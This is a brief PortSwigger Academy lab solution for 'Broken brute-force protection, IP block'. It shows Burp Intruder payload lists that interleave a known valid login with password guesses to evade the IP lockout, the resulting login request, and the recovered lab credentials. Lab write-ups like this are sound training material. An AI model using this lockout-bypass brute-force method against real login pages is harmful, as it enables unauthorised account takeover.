Skip to content

Port Swigger Broken brute force protection, IP blo

Broken brute-force protection, IP block

Solution

Open the website: https://0a15002a04aca0988166342e0041003e.web-security-academy.net/login

https://0a15002a04aca0988166342e0041003e.web-security-academy.net/login

Create a list of payloads in position 2

I added to wordlist https://portswigger.net/web-security/authentication/auth-lab-passwords "peter" in format:
...
123456
peter
123456
peter
12345678
peter
...

Change "Resource pool" from 10 to 1

Create list of payloads in the position 1

carlos
wiener
carlos
wiener
...

Find "Status code" = 302 for user carlos

POST /login HTTP/2
Host: 0a15002a04aca0988166342e0041003e.web-security-academy.net
Cookie: session=hLMvnv6t0iZPICZRgveGoQPSZAHU1H3e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0a15002a04aca0988166342e0041003e.web-security-academy.net
Referer: https://0a15002a04aca0988166342e0041003e.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

username=carlos&password=cheese

Login as user carlos

Correct creds
L: carlos
P: cheese

Solved